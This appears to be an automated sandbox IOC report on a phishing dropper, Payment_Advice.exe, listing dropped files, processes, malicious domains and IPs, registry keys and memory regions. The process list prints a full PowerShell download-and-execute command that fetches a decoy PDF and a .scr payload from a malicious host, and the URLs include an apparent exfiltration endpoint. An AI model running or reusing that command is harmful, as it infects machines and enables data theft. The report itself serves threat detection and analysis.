IOC Report
Payment_Advice.exe

loading gif

Files

File Path
Type
Category
Malicious
Payment_Advice.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\Public\Payment_Advice.pdf
PDF document, version 1.4, 1 pages
dropped
malicious
C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs
data
dropped
malicious
C:\Windows\Temp\hadvices.scr
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xd9fe882d, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4b141779-8272-4dee-8709-72b82cd279c6.tmp
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF65e10e.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f852accf-f28f-4ae2-8d30-4d118b5cda62.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240501131714Z-209.bmp
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.4856
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hadvices.scr.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSI4e076.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfkztsop.5yd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k51jbhqe.hkh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-01 15-17-11-261.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\79871d27-0a6d-4cd6-b73d-e2d46aa9b4ce.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\9f7c0cdb-c909-4e29-af04-38acd963e81f.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\d1ee8daa-a8ce-4d69-b25f-47a9fefe7d26.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1111944
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\d8e14f58-9577-42bf-9621-9055a66d181f.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 48 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Payment_Advice.exe
"C:\Users\user\Desktop\Payment_Advice.exe"
malicious
C:\Users\user\Desktop\Payment_Advice.exe
"C:\Users\user\Desktop\Payment_Advice.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
malicious
C:\Windows\Temp\hadvices.scr
"C:\Windows\Temp\hadvices.scr" /S
malicious
C:\Windows\Temp\hadvices.scr
"C:\Windows\Temp\hadvices.scr"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://advising-receipts.com/hsbc/hadvices.scr
172.67.141.195
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://advising-receipts.com
unknown
malicious
https://advising-receipts.com/hsbc/Payment_Advice.pdf
172.67.141.195
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://advising-receipts.com
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
http://checkip.dyndns.org
unknown
https://github.com/Pester/Pester
unknown
http://go.mic
unknown
http://mail.qoldenfrontier.com
unknown
https://www.adobe.co
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
http://checkip.dyndns.org/
193.122.130.0
https://reallyfreegeoip.org/xml/149.18.24.96
172.67.177.134
https://reallyfreegeoip.org/xml/149.18.24.96$
unknown
http://checkip.dyndns.org/q
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://scratchdreams.tk
unknown
http://reallyfreegeoip.org
unknown
https://reallyfreegeoip.org
unknown
https://scratchdreams.tk/_send_.php?TS
172.67.169.18
https://aka.ms/pscore68
unknown
http://checkip.dyndns.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://scratchdreams.tk
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
mail.qoldenfrontier.com
108.167.142.65
malicious
advising-receipts.com
172.67.141.195
malicious
checkip.dyndns.org
unknown
malicious
reallyfreegeoip.org
172.67.177.134
scratchdreams.tk
172.67.169.18
checkip.dyndns.com
193.122.130.0

IPs

IP
Domain
Country
Malicious
172.67.141.195
advising-receipts.com
United States
malicious
108.167.142.65
mail.qoldenfrontier.com
United States
malicious
23.56.12.145
unknown
United States
172.67.169.18
scratchdreams.tk
United States
193.122.130.0
checkip.dyndns.com
United States
127.0.0.1
unknown
unknown
172.67.177.134
reallyfreegeoip.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileSource
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sFileAncestors
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uPageCount
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sAssetId
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
bisSharedFile
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sFileAncestors
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uPageCount
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
bisSharedFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
FileDirectory
There are 43 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3131000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
3E56000
trusted library allocation
page read and write
malicious
3419000
trusted library allocation
page read and write
malicious
7FFAACED0000
trusted library allocation
page read and write
114A000
trusted library allocation
page execute and read and write
2BA6000
trusted library allocation
page read and write
28FCBBD7000
heap
page read and write
1720000
trusted library allocation
page read and write
1114000
trusted library allocation
page read and write
1400000
trusted library allocation
page read and write
1E16CCF3000
heap
page read and write
1B480C32000
trusted library allocation
page read and write
1432000
heap
page read and write
7FFAACDF0000
trusted library allocation
page read and write
55EE000
trusted library allocation
page read and write
5D90000
trusted library allocation
page execute and read and write
5382000
trusted library allocation
page read and write
6F9E000
stack
page read and write
1E167F1A000
heap
page read and write
5750000
trusted library allocation
page read and write
28FCD650000
heap
page read and write
1E1675A0000
heap
page read and write
5C7F000
stack
page read and write
FE075FB000
stack
page read and write
3241000
trusted library allocation
page read and write
5475873000
stack
page read and write
5342000
trusted library section
page read and write
13D3000
trusted library allocation
page execute and read and write
1B4E93D0000
heap
page readonly
41A1000
trusted library allocation
page read and write
1E16CB60000
trusted library allocation
page read and write
6DDE000
stack
page read and write
1243000
heap
page read and write
2BB0000
trusted library allocation
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
7FFAACDC0000
trusted library allocation
page read and write
5630000
trusted library allocation
page read and write
1732000
trusted library allocation
page read and write
C30000
unkown
page readonly
C732A7E000
unkown
page readonly
3A1E000
stack
page read and write
13D0000
trusted library allocation
page read and write
547603F000
stack
page read and write
13CE000
stack
page read and write
5475E37000
stack
page read and write
129E000
stack
page read and write
55F6000
trusted library allocation
page read and write
33DE000
trusted library allocation
page read and write
5656000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
7FFB226E0000
unkown
page read and write
32CA000
trusted library allocation
page read and write
345C000
trusted library allocation
page read and write
1E16CA80000
trusted library allocation
page read and write
3448000
trusted library allocation
page read and write
142D000
heap
page read and write
C7335FE000
stack
page read and write
1E168A30000
trusted library allocation
page read and write
58CD000
stack
page read and write
33A9000
trusted library allocation
page read and write
41D2000
trusted library allocation
page read and write
1B4E9C7C000
heap
page read and write
1E16CA80000
trusted library allocation
page read and write
172D000
trusted library allocation
page execute and read and write
1B48160B000
trusted library allocation
page read and write
1160000
heap
page read and write
28FCBBA0000
heap
page read and write
31ED000
trusted library allocation
page read and write
C73427E000
stack
page read and write
630E000
stack
page read and write
33E8000
trusted library allocation
page read and write
FE070FF000
stack
page read and write
33D6000
trusted library allocation
page read and write
53C4000
trusted library allocation
page read and write
13E6000
heap
page read and write
2DAE000
stack
page read and write
5760000
trusted library allocation
page read and write
31E7000
trusted library allocation
page read and write
1100000
trusted library allocation
page read and write
4F4E000
stack
page read and write
C733AFE000
stack
page read and write
1B4E9B80000
heap
page read and write
31EF000
trusted library allocation
page read and write
1E16CCF8000
heap
page read and write
533F000
trusted library section
page read and write
5476CCD000
stack
page read and write
1E167600000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
7FFAACEA0000
trusted library allocation
page read and write
6C5E000
stack
page read and write
1730000
trusted library allocation
page read and write
7FFAACE70000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
31EA000
trusted library allocation
page read and write
1B4E9D15000
heap
page read and write
7FFAACE40000
trusted library allocation
page read and write
5476D4B000
stack
page read and write
11A0000
heap
page read and write
1B4E93A5000
heap
page read and write
5476B0E000
stack
page read and write
C73417E000
unkown
page readonly
53B5000
trusted library allocation
page read and write
1920000
heap
page read and write
1E167679000
heap
page read and write
6B1E000
stack
page read and write
32E6000
trusted library allocation
page read and write
B90000
heap
page read and write
C73367E000
unkown
page readonly
339F000
trusted library allocation
page read and write
1E1686B0000
trusted library section
page readonly
1B4E9390000
trusted library allocation
page read and write
2C78000
trusted library allocation
page read and write
389E000
stack
page read and write
1E16CA70000
trusted library allocation
page read and write
1B4E7A5F000
heap
page read and write
64AF000
stack
page read and write
7030000
trusted library allocation
page read and write
118E000
heap
page read and write
53C9000
trusted library allocation
page read and write
57B0000
trusted library section
page read and write
1740000
trusted library allocation
page read and write
5BCE000
stack
page read and write
10FE000
stack
page read and write
3C5F000
stack
page read and write
1390000
heap
page read and write
1B4E9A90000
heap
page execute and read and write
7FFB226E5000
unkown
page readonly
53A6000
trusted library allocation
page read and write
1B4E79F8000
heap
page read and write
1B4E79D0000
heap
page read and write
122D000
heap
page read and write
1B4E99A8000
heap
page read and write
C73387E000
unkown
page readonly
54758FE000
stack
page read and write
5617000
trusted library allocation
page read and write
1B4E9A3B000
heap
page read and write
514D000
stack
page read and write
1E16CD00000
heap
page read and write
32AF000
trusted library allocation
page read and write
6C1E000
stack
page read and write
1157000
trusted library allocation
page execute and read and write
1140000
trusted library allocation
page read and write
1E16CCCA000
heap
page read and write
7FFAACD80000
trusted library allocation
page read and write
7FFAACE90000
trusted library allocation
page read and write
156E000
stack
page read and write
1221000
heap
page read and write
33B2000
trusted library allocation
page read and write
5ACE000
stack
page read and write
11F0000
trusted library allocation
page read and write
1B480232000
trusted library allocation
page read and write
1E16CAB0000
trusted library allocation
page read and write
1150000
trusted library allocation
page read and write
558E000
stack
page read and write
FE06FFF000
stack
page read and write
12FE000
stack
page read and write
C733B7E000
unkown
page readonly
1E167729000
heap
page read and write
1B4E7A87000
heap
page read and write
568E000
stack
page read and write
5320000
heap
page read and write
7FFB226C1000
unkown
page execute read
1E16767B000
heap
page read and write
1B4815D9000
trusted library allocation
page read and write
1189000
heap
page read and write
679E000
stack
page read and write
1B4E9A62000
heap
page read and write
3011000
trusted library allocation
page read and write
1235000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
1E168340000
trusted library allocation
page read and write
1B4E7D45000
heap
page read and write
1E167F02000
heap
page read and write
586C000
trusted library allocation
page read and write
1B481B29000
trusted library allocation
page read and write
1E1686D0000
trusted library section
page readonly
6EE0D000
unkown
page read and write
1E167DC1000
trusted library allocation
page read and write
5380000
trusted library allocation
page read and write
5475A7F000
stack
page read and write
7FFB226E2000
unkown
page readonly
10F6000
stack
page read and write
1B480001000
trusted library allocation
page read and write
7037000
trusted library allocation
page read and write
1E16768F000
heap
page read and write
1E1685B0000
trusted library allocation
page read and write
6A2B000
heap
page read and write
1B4E9CA2000
heap
page read and write
7FFB226C1000
unkown
page execute read
3DC4000
trusted library allocation
page read and write
1B490001000
trusted library allocation
page read and write
FE06DFE000
stack
page read and write
3324000
trusted library allocation
page read and write
33DC000
trusted library allocation
page read and write
1630000
trusted library allocation
page read and write
7FFB226D6000
unkown
page readonly
6EDF0000
unkown
page readonly
2CA0000
heap
page execute and read and write
1580000
heap
page read and write
11A3000
heap
page read and write
55D2000
trusted library allocation
page read and write
11EE000
stack
page read and write
69EC000
heap
page read and write
31F3000
trusted library allocation
page read and write
1134000
trusted library allocation
page read and write
7FFAACD31000
trusted library allocation
page read and write
7FFAACD3A000
trusted library allocation
page read and write
5475AFD000
stack
page read and write
1747000
trusted library allocation
page execute and read and write
16F0000
heap
page read and write
992000
unkown
page readonly
343E000
trusted library allocation
page read and write
55F1000
trusted library allocation
page read and write
585E000
trusted library allocation
page read and write
1B4E9473000
trusted library allocation
page read and write
53D0000
trusted library allocation
page read and write
2F4F000
stack
page read and write
328C000
trusted library allocation
page read and write
1120000
heap
page read and write
538B000
trusted library allocation
page read and write
1E167613000
heap
page read and write
1E167702000
heap
page read and write
2E4E000
stack
page read and write
1B481B25000
trusted library allocation
page read and write
2C70000
trusted library allocation
page read and write
2FF6000
trusted library allocation
page read and write
1E16CD02000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
55AE000
stack
page read and write
3202000
trusted library allocation
page read and write
1B4E93A0000
heap
page read and write
7FFB226C0000
unkown
page readonly
1E16CD0A000
heap
page read and write
3D9F000
stack
page read and write
7FFAACEE0000
trusted library allocation
page read and write
54759FE000
stack
page read and write
1120000
heap
page read and write
3245000
trusted library allocation
page read and write
1E168690000
trusted library section
page readonly
6EE0D000
unkown
page read and write
1B4E9A17000
heap
page read and write
7DF4C6700000
trusted library allocation
page execute and read and write
1E16CC1F000
heap
page read and write
1B481D8D000
trusted library allocation
page read and write
1B4E9CD8000
heap
page read and write
5475EBA000
stack
page read and write
11D5000
heap
page read and write
1E16CBD0000
trusted library allocation
page read and write
166E000
stack
page read and write
5475D3F000
stack
page read and write
C7337FE000
stack
page read and write
3110000
trusted library allocation
page read and write
5C4E000
stack
page read and write
564A000
trusted library allocation
page read and write
3DCA000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
C733F7E000
unkown
page readonly
C73357E000
unkown
page readonly
28FCBBB2000
heap
page read and write
3DB5000
trusted library allocation
page read and write
563A000
trusted library allocation
page read and write
53A1000
trusted library allocation
page read and write
1E16CE20000
remote allocation
page read and write
13E4000
trusted library allocation
page read and write
1E16CC8A000
heap
page read and write
C732C7E000
unkown
page readonly
1710000
trusted library allocation
page read and write
1E167E00000
heap
page read and write
124D000
heap
page read and write
1B481755000
trusted library allocation
page read and write
C73377E000
unkown
page readonly
6EE0F000
unkown
page readonly
54B0000
trusted library allocation
page read and write
1760000
trusted library allocation
page read and write
7FFAACB8D000
trusted library allocation
page execute and read and write
1440000
heap
page execute and read and write
C7348FE000
stack
page read and write
5690000
trusted library allocation
page read and write
C7334FE000
stack
page read and write
7FFAACE50000
trusted library allocation
page read and write
5770000
trusted library allocation
page read and write
7FFAACDA0000
trusted library allocation
page read and write
C733C7B000
stack
page read and write
1E16CCFA000
heap
page read and write
FE072FD000
stack
page read and write
1E16CCC0000
heap
page read and write
3239000
trusted library allocation
page read and write
504D000
stack
page read and write
39DF000
stack
page read and write
1B4E9A08000
heap
page read and write
9F1000
unkown
page readonly
5475F3E000
stack
page read and write
1B481CC8000
trusted library allocation
page read and write
FF0000
heap
page read and write
5610000
trusted library allocation
page read and write
5D3E000
stack
page read and write
1B4E93E0000
trusted library allocation
page read and write
5475C7D000
stack
page read and write
C73347E000
unkown
page readonly
583D000
stack
page read and write
C732F7C000
stack
page read and write
6CDE000
stack
page read and write
3284000
trusted library allocation
page read and write
3E4E000
trusted library allocation
page read and write
173A000
trusted library allocation
page execute and read and write
1E16CC54000
heap
page read and write
5475B7E000
stack
page read and write
FE073FE000
stack
page read and write
3430000
trusted library allocation
page read and write
1E167E02000
